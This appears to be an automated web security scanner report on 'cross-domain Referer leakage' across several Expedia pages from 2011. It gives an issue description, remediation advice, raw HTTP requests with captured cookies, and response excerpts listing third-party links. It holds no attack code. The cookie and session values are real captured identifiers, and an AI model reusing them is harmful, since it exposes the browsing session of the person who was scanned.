When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSLB=1; SSRT1=yvL1TQE; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:03:04 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=E_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:15 GMT
Set-Cookie: JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; Domain=.expedia.com; Expires=Sun, 12-Jun-2016 16:31:10 GMT; Path=/
Content-Length: 536572

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta name="language" content="en_US"/>
<meta name="robots" con
...[SNIP]...
<noscript>
<iframe class="xp-b-noXpend" src="http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nausi164;u16=USD;u13=892034;u14=215.2;u11=40;u9=Millenium Hilton;u7=2|0;u6=1;u4=20110714|20110718;u1=Hotel;u2=178293;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
<noscript>                                                                                
<iframe class="xp-b-noXpend" src="http://fls.doubleclick.net/activityi;src=2588797;type=nausc826;cat=nausi956;u1=Hotel;u4=20110714|20110718;u2=178293;u6=1;u7=2|0;u9=Millenium Hilton;u11=40;u13=892034;u14=215.2;u16=USD;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<div style="float:left;padding:8px 5px 0px 0px;color:#003e7e;font-size:12px;font-weight:bold;"><a href="http://www.facebook.com/expedia" style="text-decoration:none;color:#003e7e;" target="_blank">Like us on Facebook</a></div>
   <iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=21&ref=header" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-top:4px;" allowTransparency="true"></iframe>
...[SNIP]...
</span>
   <img id="staticMap_image" src="http://maps.google.com/staticmap?client=gme-expedia&size=222x136&zoom=14&sensor=false&format=png8&markers=40.71167,-74.01048,red|" width="192" height="136" onload="YAHOO.cx.exp.widget.infosite.StaticMap.showMap()" alt="MAP" />
</div>
...[SNIP]...
<div id="infosite_opinionLab-container">
   <a id="nav-tool-feedback" class="xp-t-bold" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" href="https://secure.opinionlab.com/ccc01/comment_card.asp" target="_top" rel="nofollow">
       Give your feedback to help us make improvements
   </a>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaccess.com/US/Special_Prog.aspx" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Travel Agents Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.be" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.ca" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.dk" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.fr" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.de" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.it" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.se" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...

6.2. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/deals/summervacationsale/default.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID1=AwCDeikAAAAA5ufnTf9NBgHm5-dNAQDm5-dNAAAAAAAAAADm5-dNAQAnAAAA-gQAAAI; MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; SSRT1=5-fnTQE; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 71777
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 71998
Date: Mon, 13 Jun 2011 11:26:51 GMT
Connection: close
Set-Cookie: SSRT1=-_P1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:26:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<div style="float:left;padding:8px 5px 0px 0px;color:#003e7e;font-size:12px;font-weight:bold;"><a href="http://www.facebook.com/expedia" style="text-decoration:none;color:#003e7e;" target="_blank">Like us on Facebook</a></div>
   <iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=21&ref=header" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-top:4px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="fb_like">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaccess.com/US/Special_Prog.aspx" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Travel Agents Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.be" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.ca" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.dk" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.fr" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.de" title="Expedia.de" class="flag-de" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.ie" title="Expedia.ie" class="flag-ie" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.it" title="Expedia.it" class="flag-it" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.nl" title="Expedia.nl" class="flag-nl" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.no" title="Expedia.no" class="flag-no" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<li><a href="http://www.expedia.es" title="Expedia.es" class="flag-es" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.se" title="Expedia.se" class="flag-se" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a>
...[SNIP]...
<div id="footer-copyright" class="footer-list-container">
&copy;2011 <a href="http://www.expediainc.com/" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Copyright')">Expedia, Inc.</a>
...[SNIP]...

6.3. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/deals/summervacationsale/destination_deals.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 67956
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 68177
Date: Mon, 13 Jun 2011 11:21:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
</script>

<a id="nav-tool-feedback" rel="nofollow" target="_top" href="https://secure.opinionlab.com/ccc01/comment_card.asp" onclick="xp.nav.trackAnalytics(this,'a','Head:Nav:None:Opinion');OpinionLab.O_LC();return false;" >
Feedback
</a>
...[SNIP]...
<div style="float:left;padding:8px 5px 0px 0px;color:#003e7e;font-size:12px;font-weight:bold;"><a href="http://www.facebook.com/expedia" style="text-decoration:none;color:#003e7e;" target="_blank">Like us on Facebook</a></div>
   <iframe src="http://www.facebook.com/plugins/like.php?href=www.facebook.com%2Fexpedia&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;height=21&ref=header" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:21px; margin-top:4px;" allowTransparency="true"></iframe>
...[SNIP]...
<li><a href="https://joinexpedia.com/us/us.asp" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Add a Hotel</a>
...[SNIP]...
<li><a href="http://www.expediaaccess.com/US/Special_Prog.aspx" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Travel Agents Affiliate Program</a>
...[SNIP]...
<li><a href="http://www.expediaaffiliate.com/private-label-xml.html" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:PartnerService')">Expedia Private Label</a>
...[SNIP]...
<li><a href="http://www.hotels.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotels.com</a>
...[SNIP]...
<li><a href="http://www.tripadvisor.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TripAdvisor</a>
...[SNIP]...
<li><a href="http://www.venere.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Venere</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Hotwire</a>
...[SNIP]...
<li><a href="http://www.classicvacations.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ClassicVacations.com</a>
...[SNIP]...
<li><a href="http://www.bloglines.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Bloglines</a>
...[SNIP]...
<li><a href="http://www.carrentals.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CarRentals.com</a>
...[SNIP]...
<li><a href="http://www.citysearch.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">CitySearch</a>
...[SNIP]...
<li><a href="http://www.evite.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Evite</a>
...[SNIP]...
<li><a href="http://www.gifts.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Gifts</a>
...[SNIP]...
<li><a href="http://www.lendingtree.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Lending Tree</a>
...[SNIP]...
<li><a href="http://www.match.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Match</a>
...[SNIP]...
<li><a href="http://www.hsn.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Online Shopping</a>
...[SNIP]...
<li><a href="http://www.pronto.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Pronto</a>
...[SNIP]...
<li><a href="http://www.servicemagic.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">ServiceMagic</a>
...[SNIP]...
<li><a href="http://www.shoebuy.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Shoes</a>
...[SNIP]...
<li><a href="http://www.thedailybeast.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">The Daily Beast</a>
...[SNIP]...
<li><a href="http://www.ticketweb.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">TicketWeb</a>
...[SNIP]...
<li><a href="http://www.travel-ticker.com/" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:Epartners')">Travel Ticker</a>
...[SNIP]...
<li><a href="http://investors.expediainc.com/phoenix.zhtml?c=190013&p=irol-irhome" rel="nofollow" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:CorporateLink')">Investor Relations</a>
...[SNIP]...
<li><a href="http://www.expedia.at" title="Expedia.at" class="flag-at" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.be" title="Expedia.be" class="flag-be" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.ca" title="Expedia.ca" class="flag-ca" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.dk" title="Expedia.dk" class="flag-dk" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
                    <li><a href="http://www.expedia.fr" title="Expedia.fr" class="flag-fr" onclick="xp.nav.trackAnalytics(this,'a','Footer:All:AllSites')"></a></li>
